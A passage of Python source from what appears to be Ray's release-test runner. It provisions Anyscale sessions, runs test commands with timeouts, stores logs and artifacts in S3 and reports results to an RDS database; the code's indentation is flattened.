raise PrepareCommandTimeoutError(
"Process timed out in the prepare command stage.")
if timeout_type == "command":
raise CommandTimeoutError(
"Process timed out while running a command.")
elif timeout_type == "file_sync":
raise FileSyncTimeoutError(
"Process timed out while syncing files.")
elif timeout_type == "session":
raise SessionTimeoutError(
"Process timed out while starting a session.")
else:
assert False, "Unexpected timeout type."
def _deep_update(d, u):
for k, v in u.items():
if isinstance(v, collections.abc.Mapping):
d[k] = _deep_update(d.get(k, {}), v)
else:
d[k] = v
return d
def _dict_hash(dt: Dict[Any, Any]) -> str:
json_str = json.dumps(dt, sort_keys=True, ensure_ascii=True)
sha = hashlib.sha256()
sha.update(json_str.encode())
return sha.hexdigest()
def _load_config(local_dir: str, config_file: Optional[str]) -> Optional[Dict]:
if not config_file:
return None
config_path = os.path.join(local_dir, config_file)
with open(config_path, "rt") as f:
# Todo: jinja2 render
content = f.read()
env = copy.deepcopy(os.environ)
env.update(GLOBAL_CONFIG)
content = jinja2.Template(content).render(env=env)
return yaml.safe_load(content)
def has_errored(result: Dict[Any, Any]) -> bool:
return result.get("status", "invalid") != "finished"
def report_result(test_suite: str, test_name: str, status: str, logs: str,
results: Dict[Any, Any], artifacts: Dict[Any, Any],
category: str):
now = datetime.datetime.utcnow()
rds_data_client = boto3.client("rds-data", region_name="us-west-2")
schema = GLOBAL_CONFIG["RELEASE_AWS_DB_TABLE"]
sql = (
f"INSERT INTO {schema} "
f"(created_on, test_suite, test_name, status, last_logs, "
f"results, artifacts, category) "
f"VALUES (:created_on, :test_suite, :test_name, :status, :last_logs, "
f":results, :artifacts, :category)")
rds_data_client.execute_statement(
database=GLOBAL_CONFIG["RELEASE_AWS_DB_NAME"],
parameters=[
{
"name": "created_on",
"typeHint": "TIMESTAMP",
"value": {
"stringValue": now.strftime("%Y-%m-%d %H:%M:%S")
},
},
{
"name": "test_suite",
"value": {
"stringValue": test_suite
}
},
{
"name": "test_name",
"value": {
"stringValue": test_name
}
},
{
"name": "status",
"value": {
"stringValue": status
}
},
{
"name": "last_logs",
"value": {
"stringValue": logs
}
},
{
"name": "results",
"typeHint": "JSON",
"value": {
"stringValue": json.dumps(results)
},
},
{
"name": "artifacts",
"typeHint": "JSON",
"value": {
"stringValue": json.dumps(artifacts)
},
},
{
"name": "category",
"value": {
"stringValue": category
}
},
],
secretArn=GLOBAL_CONFIG["RELEASE_AWS_DB_SECRET_ARN"],
resourceArn=GLOBAL_CONFIG["RELEASE_AWS_DB_RESOURCE_ARN"],
schema=schema,
sql=sql,
)
def log_results_and_artifacts(result: Dict):
results = result.get("results", {})
if results:
msg = "Observed the following results:\n\n"
for key, val in results.items():
msg += f" {key} = {val}\n"
else:
msg = "Did not find any results."
logger.info(msg)
artifacts = result.get("artifacts", {})
if artifacts:
msg = "Saved the following artifacts:\n\n"
for key, val in artifacts.items():
msg += f" {key} = {val}\n"
else:
msg = "Did not find any artifacts."
logger.info(msg)
def _cleanup_session(sdk: AnyscaleSDK, session_id: str):
if session_id:
# Just trigger a request. No need to wait until session shutdown.
sdk.terminate_session(
session_id=session_id, terminate_session_options={})
def search_running_session(sdk: AnyscaleSDK, project_id: str,
session_name: str) -> Optional[str]:
session_id = None
logger.info(f"Looking for existing session with name {session_name}")
result = sdk.search_sessions(
project_id=project_id,
sessions_query=dict(name=dict(equals=session_name)))
if len(result.results) > 0 and result.results[0].state == "Running":
logger.info("Found existing session.")
session_id = result.results[0].id
return session_id
def create_or_find_compute_template(
sdk: AnyscaleSDK,
project_id: str,
compute_tpl: Dict[Any, Any],
_repeat: bool = True) -> Tuple[Optional[str], Optional[str]]:
compute_tpl_id = None
compute_tpl_name = None
if compute_tpl:
# As of Anyscale 0.4.1, it is an error to use the same compute template
# name within the same organization, between different projects.
compute_tpl_name = f"{project_id}/compute/{_dict_hash(compute_tpl)}"
logger.info(f"Tests uses compute template "
f"with name {compute_tpl_name}. Looking up existing "
f"templates.")
paging_token = None
while not compute_tpl_id:
result = sdk.search_compute_templates(
dict(
project_id=project_id,
name=dict(equals=compute_tpl_name),
include_anonymous=True),
paging_token=paging_token)
paging_token = result.metadata.next_paging_token
for res in result.results:
if res.name == compute_tpl_name:
compute_tpl_id = res.id
logger.info(
f"Template already exists with ID {compute_tpl_id}")
break
if not paging_token:
break
if not compute_tpl_id:
logger.info(f"Compute template not found. "
f"Creating with name {compute_tpl_name}.")
try:
result = sdk.create_compute_template(
dict(
name=compute_tpl_name,
project_id=project_id,
config=compute_tpl))
compute_tpl_id = result.result.id
except Exception as e:
if _repeat:
logger.warning(
f"Got exception when trying to create compute "
f"template: {e}. Sleeping for 10 seconds and then "
f"try again once...")
time.sleep(10)
return create_or_find_compute_template(
sdk=sdk,
project_id=project_id,
compute_tpl=compute_tpl,
_repeat=False)
raise e
logger.info(f"Compute template created with ID {compute_tpl_id}")
return compute_tpl_id, compute_tpl_name
def create_or_find_app_config(
sdk: AnyscaleSDK,
project_id: str,
app_config: Dict[Any, Any],
_repeat: bool = True) -> Tuple[Optional[str], Optional[str]]:
app_config_id = None
app_config_name = None
if app_config:
app_config_name = f"{project_id}-{_dict_hash(app_config)}"
logger.info(f"Test uses an app config with hash {app_config_name}. "
f"Looking up existing app configs with this name.")
paging_token = None
while not app_config_id:
result = sdk.list_app_configs(
project_id=project_id, count=50, paging_token=paging_token)
paging_token = result.metadata.next_paging_token
for res in result.results:
if res.name == app_config_name:
app_config_id = res.id
logger.info(
f"App config already exists with ID {app_config_id}")
break
if not paging_token or app_config_id:
break
if not app_config_id:
logger.info("App config not found. Creating new one.")
try:
result = sdk.create_app_config(
dict(
name=app_config_name,
project_id=project_id,
config_json=app_config))
app_config_id = result.result.id
except Exception as e:
if _repeat:
logger.warning(
f"Got exception when trying to create app "
f"config: {e}. Sleeping for 10 seconds and then "
f"try again once...")
time.sleep(10)
return create_or_find_app_config(
sdk=sdk,
project_id=project_id,
app_config=app_config,
_repeat=False)
raise e
logger.info(f"App config created with ID {app_config_id}")
return app_config_id, app_config_name
def install_app_config_packages(app_config: Dict[Any, Any]):
os.environ.update(app_config.get("env_vars", {}))
packages = app_config["python"]["pip_packages"]
for package in packages:
subprocess.check_output(["pip", "install", "-U", package], text=True)
def install_matching_ray():
wheel = os.environ.get("RAY_WHEELS", None)
if not wheel:
return
assert "manylinux2014_x86_64" in wheel, wheel
if sys.platform == "darwin":
platform = "macosx_10_15_intel"
elif sys.platform == "win32":
platform = "win_amd64"
else:
platform = "manylinux2014_x86_64"
wheel = wheel.replace("manylinux2014_x86_64", platform)
subprocess.check_output(["pip", "uninstall", "-y", "ray"], text=True)
subprocess.check_output(["pip", "install", "-U", wheel], text=True)
def wait_for_build_or_raise(sdk: AnyscaleSDK,
app_config_id: Optional[str]) -> Optional[str]:
if not app_config_id:
return None
# Fetch build
build_id = None
last_status = None
result = sdk.list_builds(app_config_id)
for build in sorted(result.results, key=lambda b: b.created_at):
build_id = build.id
last_status = build.status
if build.status == "failed":
continue
if build.status == "succeeded":
logger.info(f"Link to app config build: "
f"{anyscale_app_config_build_url(build_id)}")
return build_id
if last_status == "failed":
raise RuntimeError("App config build failed.")
if not build_id:
raise RuntimeError("No build found for app config.")
# Build found but not failed/finished yet
completed = False
start_wait = time.time()
next_report = start_wait + REPORT_S
logger.info(f"Waiting for build {build_id} to finish...")
logger.info(f"Track progress here: "
f"{anyscale_app_config_build_url(build_id)}")
while not completed:
now = time.time()
if now > next_report:
logger.info(f"... still waiting for build {build_id} to finish "
f"({int(now - start_wait)} seconds) ...")
next_report = next_report + REPORT_S
result = sdk.get_build(build_id)
build = result.result
if build.status == "failed":
raise RuntimeError(
f"App config build failed. Please see "
f"{anyscale_app_config_build_url(build_id)} for details")
if build.status == "succeeded":
logger.info("Build succeeded.")
return build_id
completed = build.status not in ["in_progress", "pending"]
if completed:
raise RuntimeError(
f"Unknown build status: {build.status}. Please see "
f"{anyscale_app_config_build_url(build_id)} for details")
time.sleep(1)
return build_id
def run_job(cluster_name: str, compute_tpl_name: str, cluster_env_name: str,
job_name: str, min_workers: str, script: str,
script_args: List[str], env_vars: Dict[str, str],
autosuspend: int) -> Tuple[int, str]:
# Start cluster and job
address = f"anyscale://{cluster_name}?cluster_compute={compute_tpl_name}" \
f"&cluster_env={cluster_env_name}&autosuspend={autosuspend}" \
"&&update=True"
logger.info(f"Starting job {job_name} with Ray address: {address}")
env = copy.deepcopy(os.environ)
env.update(GLOBAL_CONFIG)
env.update(env_vars)
env["RAY_ADDRESS"] = address
env["RAY_JOB_NAME"] = job_name
env["RAY_RELEASE_MIN_WORKERS"] = str(min_workers)
proc = subprocess.Popen(
script.split(" ") + script_args,
env=env,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
text=True)
proc.stdout.reconfigure(line_buffering=True)
logs = ""
for line in proc.stdout:
logs += line
sys.stdout.write(line)
proc.wait()
return proc.returncode, logs
def create_and_wait_for_session(
sdk: AnyscaleSDK,
stop_event: multiprocessing.Event,
session_name: str,
session_options: Dict[Any, Any],
) -> str:
# Create session
logger.info(f"Creating session {session_name}")
result = sdk.create_session(session_options)
session_id = result.result.id
# Trigger session start
logger.info(f"Starting session {session_name} ({session_id})")
session_url = anyscale_session_url(
project_id=GLOBAL_CONFIG["ANYSCALE_PROJECT"], session_id=session_id)
logger.info(f"Link to session: {session_url}")
result = sdk.start_session(session_id, start_session_options={})
sop_id = result.result.id
completed = result.result.completed
# Wait for session
logger.info(f"Waiting for session {session_name}...")
start_wait = time.time()
next_report = start_wait + REPORT_S
while not completed:
_check_stop(stop_event, "session")
now = time.time()
if now > next_report:
logger.info(f"... still waiting for session {session_name} "
f"({int(now - start_wait)} seconds) ...")
next_report = next_report + REPORT_S
session_operation_response = sdk.get_session_operation(
sop_id, _request_timeout=30)
session_operation = session_operation_response.result
completed = session_operation.completed
time.sleep(1)
return session_id
def run_session_command(sdk: AnyscaleSDK,
session_id: str,
cmd_to_run: str,
result_queue: multiprocessing.Queue,
env_vars: Dict[str, str],
state_str: str = "CMD_RUN") -> Tuple[str, int]:
full_cmd = " ".join(f"{k}={v}"
for k, v in env_vars.items()) + " " + cmd_to_run
logger.info(f"Running command in session {session_id}: \n" f"{full_cmd}")
session_url = anyscale_session_url(
project_id=GLOBAL_CONFIG["ANYSCALE_PROJECT"], session_id=session_id)
logger.info(f"Link to session: {session_url}")
result_queue.put(State(state_str, time.time(), None))
result = sdk.create_session_command(
dict(session_id=session_id, shell_command=full_cmd))
scd_id = result.result.id
return scd_id, result
def wait_for_session_command_to_complete(create_session_command_result,
sdk: AnyscaleSDK,
scd_id: str,
stop_event: multiprocessing.Event,
state_str: str = "CMD_RUN"):
result = create_session_command_result
completed = result.result.finished_at is not None
start_wait = time.time()
next_report = start_wait + REPORT_S
while not completed:
if state_str == "CMD_RUN":
_check_stop(stop_event, "command")
elif state_str == "CMD_PREPARE":
_check_stop(stop_event, "prepare_command")
now = time.time()
if now > next_report:
logger.info(f"... still waiting for command to finish "
f"({int(now - start_wait)} seconds) ...")
next_report = next_report + REPORT_S
result = sdk.get_session_command(session_command_id=scd_id)
completed = result.result.finished_at
time.sleep(1)
status_code = result.result.status_code
runtime = time.time() - start_wait
if status_code != 0:
if state_str == "CMD_RUN":
raise RuntimeError(
f"Command returned non-success status: {status_code}")
elif state_str == "CMD_PREPARE":
raise PrepareCommandRuntimeError(
f"Prepare command returned non-success status: {status_code}")
return status_code, runtime
def get_command_logs(session_controller: SessionController,
scd_id: str,
lines: int = 50):
result = session_controller.api_client.get_execution_logs_api_v2_session_commands_session_command_id_execution_logs_get( # noqa: E501
session_command_id=scd_id,
start_line=-1 * lines,
end_line=0)
return result.result.lines
def get_remote_json_content(
temp_dir: str,
session_name: str,
remote_file: Optional[str],
session_controller: SessionController,
):
if not remote_file:
logger.warning("No remote file specified, returning empty dict")
return {}
local_target_file = os.path.join(temp_dir, ".tmp.json")
session_controller.pull(
session_name=session_name,
source=remote_file,
target=local_target_file)
with open(local_target_file, "rt") as f:
return json.load(f)
def get_local_json_content(local_file: Optional[str], ):
if not local_file:
logger.warning("No local file specified, returning empty dict")
return {}
with open(local_file, "rt") as f:
return json.load(f)
def pull_artifacts_and_store_in_cloud(
temp_dir: str,
logs: str,
session_name: str,
test_name: str,
artifacts: Optional[Dict[Any, Any]],
session_controller: SessionController,
):
output_log_file = os.path.join(temp_dir, "output.log")
with open(output_log_file, "wt") as f:
f.write(logs)
bucket = GLOBAL_CONFIG["RELEASE_AWS_BUCKET"]
location = f"{GLOBAL_CONFIG['RELEASE_AWS_LOCATION']}" \
f"/{session_name}/{test_name}"
saved_artifacts = {}
s3_client = boto3.client("s3")
s3_client.upload_file(output_log_file, bucket, f"{location}/output.log")
saved_artifacts["output.log"] = f"s3://{bucket}/{location}/output.log"
# Download artifacts
if artifacts:
for name, remote_file in artifacts.items():
logger.info(f"Downloading artifact `{name}` from "
f"{remote_file}")
local_target_file = os.path.join(temp_dir, name)
session_controller.pull(
session_name=session_name,
source=remote_file,
target=local_target_file)
# Upload artifacts to s3
s3_client.upload_file(local_target_file, bucket,
f"{location}/{name}")
saved_artifacts[name] = f"s3://{bucket}/{location}/{name}"
return saved_artifacts
def find_session_by_test_name(
sdk: AnyscaleSDK,
session_controller: SessionController,
temp_dir: str,
state_json: str,
project_id: str,
test_name: str,
) -> Optional[Tuple[str, str, Dict[Any, Any]]]:
paging_token = None
while True: # Will break if paging_token is None after first search
result = sdk.search_sessions(
project_id=project_id,
sessions_query=dict(
name=dict(contains=test_name),
state_filter=["Running"],
paging=dict(count=20, paging_token=paging_token)))
for session in result.results:
logger.info(f"Found sessions {session.name}")
if not session.name.startswith(test_name):
continue
try:
session_state = get_remote_json_content(
temp_dir=temp_dir,
session_name=session.name,
remote_file=state_json,
session_controller=session_controller)
except Exception as exc:
raise RuntimeError(f"Could not get remote json content "
f"for session {session.name}") from exc
if session_state.get("test_name") == test_name:
return session.id, session.name, session_state
session_token = result.metadata.next_paging_token
if not session_token:
return None
def get_latest_running_command_id(sdk: AnyscaleSDK, session_id: str
) -> Tuple[Optional[str], Optional[bool]]:
scd_id = None
paging_token = None
success = None
while not scd_id:
result = sdk.list_session_commands(
session_id=session_id, paging_token=paging_token)
paging_token = result.metadata.next_paging_token
for cmd in result.results:
if not scd_id:
scd_id = cmd.id
completed = cmd.finished_at is not None
if completed:
if success is None:
success = True
success = success and cmd.status_code == 0
if not completed:
return cmd.id, None
return scd_id, success or False
def run_test_config(
local_dir: str,
project_id: str,
test_name: str,
test_config: Dict[Any, Any],
commit_url: str,
session_name: str = None,
smoke_test: bool = False,
no_terminate: bool = False,
kick_off_only: bool = False,
check_progress: bool = False,
upload_artifacts: bool = True,
app_config_id_override: Optional[str] = None,
) -> Dict[Any, Any]:
"""
Returns:
Dict with the following entries:
status (str): One of [finished, error, timeout]
command_link (str): Link to command (Anyscale web UI)
last_logs (str): Last logs (excerpt) to send to owner
artifacts (dict): Dict of artifacts
Key: Name
Value: S3 URL
"""
# Todo (mid-term): Support other cluster definitions
# (not only cluster configs)
cluster_config_rel_path = test_config["cluster"].get(
"cluster_config", None)
cluster_config = _load_config(local_dir, cluster_config_rel_path)
app_config_rel_path = test_config["cluster"].get("app_config", None)
app_config = _load_config(local_dir, app_config_rel_path)
compute_tpl_rel_path = test_config["cluster"].get("compute_template", None)
compute_tpl = _load_config(local_dir, compute_tpl_rel_path)
stop_event = multiprocessing.Event()
result_queue = multiprocessing.Queue()
if not session_name:
session_name = f"{test_name}_{int(time.time())}"
temp_dir = tempfile.mkdtemp()
# Result and state files
results_json = test_config["run"].get("results", None)
if results_json is None:
results_json = "/tmp/release_test_out.json"
state_json = test_config["run"].get("state", None)
if state_json is None:
state_json = "/tmp/release_test_state.json"
env_vars = {
"RAY_ADDRESS": os.environ.get("RAY_ADDRESS", "auto"),
"TEST_OUTPUT_JSON": results_json,
"TEST_STATE_JSON": state_json,
"IS_SMOKE_TEST": "1" if smoke_test else "0",
}
with open(os.path.join(local_dir, ".anyscale.yaml"), "wt") as f:
f.write(f"project_id: {project_id}")
os.chdir(local_dir)
# Setup interface
# Unfortunately, there currently seems to be no great way to
# transfer files with the Anyscale SDK.
# So we use the session controller instead.
sdk = AnyscaleSDK(auth_token=GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"])
session_controller = SessionController(
api_client=instantiate_api_client(
cli_token=GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"],
host=GLOBAL_CONFIG["ANYSCALE_HOST"],
),
anyscale_api_client=sdk.api_client,
)
timeout = test_config["run"].get("timeout", 1800)
if "RELEASE_OVERRIDE_TIMEOUT" in os.environ:
previous_timeout = timeout
timeout = int(os.environ.get("RELEASE_OVERRIDE_TIMEOUT", str(timeout)))
logger.warning(f"Release test timeout override: {timeout} "
f"(would have been {previous_timeout})")
# If a test is long running, timeout does not mean it failed
is_long_running = test_config["run"].get("long_running", False)
build_id_override = None
if test_config["run"].get("use_connect"):
autosuspend_mins = test_config["run"].get("autosuspend_mins", 5)
assert not kick_off_only, \
"Unsupported for running with Anyscale connect."
if app_config_id_override is not None:
logger.info(
"Using connect and an app config override, waiting until "
"build finishes so we can fetch the app config in order to "
"install its pip packages locally.")
build_id_override = wait_for_build_or_raise(
sdk, app_config_id_override)
response = sdk.get_cluster_environment_build(build_id_override)
app_config = response.result.config_json
install_app_config_packages(app_config)
install_matching_ray()
elif "autosuspend_mins" in test_config["run"]:
raise ValueError(
"'autosuspend_mins' is only supported if 'use_connect' is True.")
# Add information to results dict
def _update_results(results: Dict):
if "last_update" in results:
results["last_update_diff"] = time.time() - results["last_update"]
if smoke_test:
results["smoke_test"] = True
def _process_finished_command(session_controller: SessionController,
scd_id: str,
results: Optional[Dict] = None,
runtime: int = None,
commit_url: str = None,
session_url: str = None):
logger.info("Command finished successfully.")
if results_json:
results = results or get_remote_json_content(
temp_dir=temp_dir,
session_name=session_name,
remote_file=results_json,
session_controller=session_controller,
)
else:
results = {"passed": 1}
_update_results(results)
if scd_id:
logs = get_command_logs(session_controller, scd_id,
test_config.get("log_lines", 50))
else:
logs = "No command found to fetch logs for"
if upload_artifacts:
saved_artifacts = pull_artifacts_and_store_in_cloud(
temp_dir=temp_dir,
logs=logs, # Also save logs in cloud
session_name=session_name,
test_name=test_name,
artifacts=test_config.get("artifacts", {}),
session_controller=session_controller,
)
logger.info("Fetched results and stored on the cloud. Returning.")
else:
saved_artifacts = {}
logger.info("Usually I would have fetched the results and "
"artifacts and stored them on S3.")
# Add these metadata here to avoid changing SQL schema.
results["_runtime"] = runtime
results["_session_url"] = session_url
results["_commit_url"] = commit_url
results["_stable"] = test_config.get("stable", True)
result_queue.put(
State(
"END",
time.time(),
{
"status": "finished",
"last_logs": logs,
"results": results,
"artifacts": saved_artifacts,
},
))
# When running the test script in client mode, the finish command is a
# completed local process.
def _process_finished_client_command(returncode: int, logs: str):
if upload_artifacts:
saved_artifacts = pull_artifacts_and_store_in_cloud(
temp_dir=temp_dir,
logs=logs, # Also save logs in cloud
session_name=session_name,
test_name=test_name,
artifacts=None,
session_controller=None,
)
logger.info("Stored results on the cloud. Returning.")
else:
saved_artifacts = {}
logger.info("Usually I would have fetched the results and "
"artifacts and stored them on S3.")
if results_json:
results = get_local_json_content(local_file=results_json, )
else:
results = {
"passed": int(returncode == 0),
}
results["returncode"] = returncode
_update_results(results)
result_queue.put(
State(
"END",
time.time(),
{
"status": "finished",
"last_logs": logs,
"results": results,
"artifacts": saved_artifacts,
},
))
def _run(logger):
# These values will be set as the test runs.
session_url = None
runtime = None
anyscale.conf.CLI_TOKEN = GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"]
session_id = None
scd_id = None
try:
# First, look for running sessions
session_id = search_running_session(sdk, project_id, session_name)
compute_tpl_name = None
app_config_id = app_config_id_override
app_config_name = None
build_id = build_id_override
if not session_id:
logger.info("No session found.")
# Start session
session_options = dict(
name=session_name, project_id=project_id)
if cluster_config is not None:
logging.info("Starting session with cluster config")
cluster_config_str = json.dumps(cluster_config)
session_options["cluster_config"] = cluster_config_str
session_options["cloud_id"] = (
GLOBAL_CONFIG["ANYSCALE_CLOUD_ID"], )
session_options["uses_app_config"] = False
else:
logging.info("Starting session with app/compute config")
# Find/create compute template
compute_tpl_id, compute_tpl_name = \
create_or_find_compute_template(
sdk, project_id, compute_tpl)
logger.info(f"Link to compute template: "
f"{anyscale_compute_tpl_url(compute_tpl_id)}")
# Find/create app config
if app_config_id is None:
(
app_config_id,
app_config_name,
) = create_or_find_app_config(sdk, project_id,
app_config)
else:
logger.info(
f"Using override app config {app_config_id}")
app_config_name = sdk.get_app_config(
app_config_id).result.name
if build_id is None:
# We might have already retrieved the build ID when
# installing app config packages locally if using
# connect, so only get the build ID if it's not set.
build_id = wait_for_build_or_raise(sdk, app_config_id)
session_options["compute_template_id"] = compute_tpl_id
session_options["build_id"] = build_id
session_options["uses_app_config"] = True
if not test_config["run"].get("use_connect"):
session_id = create_and_wait_for_session(
sdk=sdk,
stop_event=stop_event,
session_name=session_name,
session_options=session_options,
)
if test_config["run"].get("use_connect"):
assert compute_tpl_name, "Compute template must exist."
assert app_config_name, "Cluster environment must exist."
script_args = test_config["run"].get("args", [])
if smoke_test:
script_args += ["--smoke-test"]
min_workers = 0
for node_type in compute_tpl["worker_node_types"]:
min_workers += node_type["min_workers"]
# Build completed, use job timeout
result_queue.put(State("CMD_RUN", time.time(), None))
returncode, logs = run_job(
cluster_name=test_name,
compute_tpl_name=compute_tpl_name,
cluster_env_name=app_config_name,
job_name=session_name,
min_workers=min_workers,
script=test_config["run"]["script"],
script_args=script_args,
env_vars=env_vars,
autosuspend=autosuspend_mins)
_process_finished_client_command(returncode, logs)
return
# Write test state json
test_state_file = os.path.join(local_dir, "test_state.json")
with open(test_state_file, "wt") as f:
json.dump({
"start_time": time.time(),
"test_name": test_name
}, f)
# Rsync up
logger.info("Syncing files to session...")
session_controller.push(
session_name=session_name,
source=None,
target=None,
config=None,
all_nodes=False,
)
logger.info("Syncing test state to session...")
session_controller.push(
session_name=session_name,
source=test_state_file,
target=state_json,
config=None,
all_nodes=False,
)
session_url = anyscale_session_url(
project_id=GLOBAL_CONFIG["ANYSCALE_PROJECT"],
session_id=session_id)
_check_stop(stop_event, "file_sync")
# Optionally run preparation command
prepare_command = test_config["run"].get("prepare")
if prepare_command:
logger.info(f"Running preparation command: {prepare_command}")
scd_id, result = run_session_command(
sdk=sdk,
session_id=session_id,
cmd_to_run=prepare_command,
result_queue=result_queue,
env_vars=env_vars,
state_str="CMD_PREPARE")
_, _ = wait_for_session_command_to_complete(
result,
sdk=sdk,
scd_id=scd_id,
stop_event=stop_event,
state_str="CMD_PREPARE")
# Run release test command
cmd_to_run = test_config["run"]["script"] + " "
args = test_config["run"].get("args", [])
if args:
cmd_to_run += " ".join(args) + " "
if smoke_test:
cmd_to_run += " --smoke-test"
scd_id, result = run_session_command(
sdk=sdk,
session_id=session_id,
cmd_to_run=cmd_to_run,
result_queue=result_queue,
env_vars=env_vars,
state_str="CMD_RUN")
if not kick_off_only:
_, runtime = wait_for_session_command_to_complete(
result,
sdk=sdk,
scd_id=scd_id,
stop_event=stop_event,
state_str="CMD_RUN")
_process_finished_command(
session_controller=session_controller,
scd_id=scd_id,
runtime=runtime,
session_url=session_url,
commit_url=commit_url)
else:
result_queue.put(
State("END", time.time(), {
"status": "kickoff",
"last_logs": ""
}))
except (ReleaseTestTimeoutError, Exception) as e:
logger.error(e, exc_info=True)
logs = str(e)
if scd_id is not None:
try:
logs = logs + "; Command logs:" + get_command_logs(
session_controller, scd_id,
test_config.get("log_lines", 50))
except Exception as e2:
logger.error(e2, exc_info=True)
# Long running tests are "finished" successfully when
# timed out
if isinstance(e, ReleaseTestTimeoutError) and is_long_running:
_process_finished_command(
session_controller=session_controller, scd_id=scd_id)
else:
timeout_type = ""
runtime = None
if isinstance(e, CommandTimeoutError):
timeout_type = "timeout"
runtime = 0
elif (isinstance(e, PrepareCommandTimeoutError)
or isinstance(e, FileSyncTimeoutError)
or isinstance(e, SessionTimeoutError)
or isinstance(e, PrepareCommandRuntimeError)):
timeout_type = "infra_timeout"
runtime = None
elif isinstance(e, RuntimeError):
timeout_type = "runtime_error"
runtime = 0
else:
timeout_type = "unknown timeout"
runtime = None
# Add these metadata here to avoid changing SQL schema.
results = {}
results["_runtime"] = runtime
results["_session_url"] = session_url
results["_commit_url"] = commit_url
results["_stable"] = test_config.get("stable", True)
result_queue.put(
State(
"END", time.time(), {
"status": timeout_type,
"last_logs": logs,
"results": results
}))
finally:
if no_terminate:
logger.warning(
"`no_terminate` is set to True, so the session will "
"*not* be terminated!")
else:
_cleanup_session(sdk, session_id)
def _check_progress(logger):
anyscale.conf.CLI_TOKEN = GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"]
should_terminate = False
session_id = None
scd_id = None
try:
existing_session = find_session_by_test_name(
sdk=sdk,
session_controller=session_controller,
temp_dir=temp_dir,
state_json=state_json,
project_id=project_id,
test_name=test_name)
if existing_session is None:
logger.info(f"Found no existing session for {test_name}")
result_queue.put(
State("END", time.time(), {
"status": "nosession",
"last_logs": ""
}))
return
session_id, session_name, session_state = existing_session
logger.info(f"Found existing session for {test_name}: "
f"{session_name}")
scd_id, success = get_latest_running_command_id(
sdk=sdk, session_id=session_id)
latest_result = get_remote_json_content(
temp_dir=temp_dir,
session_name=session_name,
remote_file=results_json,
session_controller=session_controller,
)
# Fetch result json and check if it has been updated recently
result_time_key = test_config["run"].get("time_key", None)
maximum_update_delay = test_config["run"].get(
"max_update_delay", None)
if result_time_key and maximum_update_delay:
last_update = latest_result.get(result_time_key, None)
if not last_update:
result_queue.put(
State(
"END", time.time(), {
"status": "error",
"last_logs": f"Test did not store "
f"{result_time_key} in the "
f"results json."
}))
return
delay = time.time() - last_update
logger.info(f"Last update was at {last_update:.2f}. "
f"This was {delay:.2f} seconds ago "
f"(maximum allowed: {maximum_update_delay})")
if delay > maximum_update_delay:
raise RuntimeError(
f"Test did not update the results json within "
f"the last {maximum_update_delay} seconds.")
if time.time() - session_state["start_time"] > timeout:
# Long running test reached timeout
logger.info(
f"Test command reached timeout after {timeout} seconds")
_process_finished_command(
session_controller=session_controller,
scd_id=scd_id,
results=latest_result)
should_terminate = True
elif success:
logger.info("All commands finished.")
_process_finished_command(
session_controller=session_controller,
scd_id=scd_id,
results=latest_result)
should_terminate = True
else:
rest_time = timeout - time.time() + session_state["start_time"]
logger.info(f"Test command should continue running "
f"for {rest_time} seconds")
result_queue.put(
State("END", time.time(), {
"status": "kickoff",
"last_logs": "Test is still running"
}))
except Exception as e:
logger.error(e, exc_info=True)
logs = str(e)
if scd_id is not None:
try:
logs = get_command_logs(session_controller, scd_id,
test_config.get("log_lines", 50))
logs += f"\n{str(e)}"
except Exception as e2:
logger.error(e2, exc_info=True)
result_queue.put(
State("END", time.time(), {
"status": "error",
"last_logs": logs
}))
should_terminate = True
finally:
if should_terminate:
logger.warning("Terminating session")
_cleanup_session(sdk, session_id)
if not check_progress:
process = multiprocessing.Process(target=_run, args=(logger, ))
else:
process = multiprocessing.Process(
target=_check_progress, args=(logger, ))
build_timeout = test_config["run"].get("build_timeout", 1800)
project_url = anyscale_project_url(
project_id=GLOBAL_CONFIG["ANYSCALE_PROJECT"])
logger.info(f"Link to project: {project_url}")
msg = f"This will now run test {test_name}."
if smoke_test:
msg += " This is a smoke test."
if is_long_running:
msg += " This is a long running test."
logger.info(msg)
logger.info(f"Starting process with timeout {timeout} "
f"(build timeout {build_timeout})")
process.start()
# The timeout time will be updated after the build finished
# Build = App config + compute template build and session start
timeout_time = time.time() + build_timeout
result = {}
while process.is_alive():
try:
state: State = result_queue.get(timeout=1)
except (Empty, TimeoutError):
if time.time() > timeout_time:
stop_event.set()
logger.warning("Process timed out.")
if not is_long_running:
logger.warning("Terminating process in 10 seconds.")
time.sleep(10)
logger.warning("Terminating process now.")
process.terminate()
else:
logger.info("Process is long running. Give 2 minutes to "
"fetch result and terminate.")
start_terminate = time.time()
while time.time(
) < start_terminate + 120 and process.is_alive():
time.sleep(1)
if process.is_alive():
logger.warning("Terminating forcefully now.")
process.terminate()
else:
logger.info("Long running results collected.")
break
continue
if not isinstance(state, State):
raise RuntimeError(f"Expected `State` object, got {result}")
if state.state == "CMD_PREPARE":
# Reset timeout after build finished
timeout_time = state.timestamp + timeout
if state.state == "CMD_RUN":
# Reset timeout after prepare command or build finished
timeout_time = state.timestamp + timeout
elif state.state == "END":
result = state.data
break
while not result_queue.empty():
state = result_queue.get_nowait()
result = state.data
logger.info("Final check if everything worked.")
try:
result.setdefault("status", "error (status not found)")
except (TimeoutError, Empty):
result = {"status": "timeout", "last_logs": "Test timed out."}
logger.info(f"Final results: {result}")
log_results_and_artifacts(result)
shutil.rmtree(temp_dir)
return result
def run_test(test_config_file: str,
test_name: str,
project_id: str,
commit_url: str,
category: str = "unspecified",
smoke_test: bool = False,
no_terminate: bool = False,
kick_off_only: bool = False,
check_progress=False,
report=True,
session_name=None,
app_config_id_override=None):
with open(test_config_file, "rt") as f:
test_configs = yaml.load(f, Loader=yaml.FullLoader)
test_config_dict = {}
for test_config in test_configs:
name = test_config.pop("name")
test_config_dict[name] = test_config
if test_name not in test_config_dict:
raise ValueError(
f"Test with name `{test_name}` not found in test config file "
f"at `{test_config_file}`.")
test_config = test_config_dict[test_name]
if smoke_test and "smoke_test" in test_config:
smoke_test_config = test_config.pop("smoke_test")
test_config = _deep_update(test_config, smoke_test_config)
local_dir = os.path.dirname(test_config_file)
if "local_dir" in test_config:
# local_dir is relative to test_config_file
local_dir = os.path.join(local_dir, test_config["local_dir"])
if test_config["run"].get("use_connect"):
assert not kick_off_only, \
"--kick-off-only is unsupported when running with " \
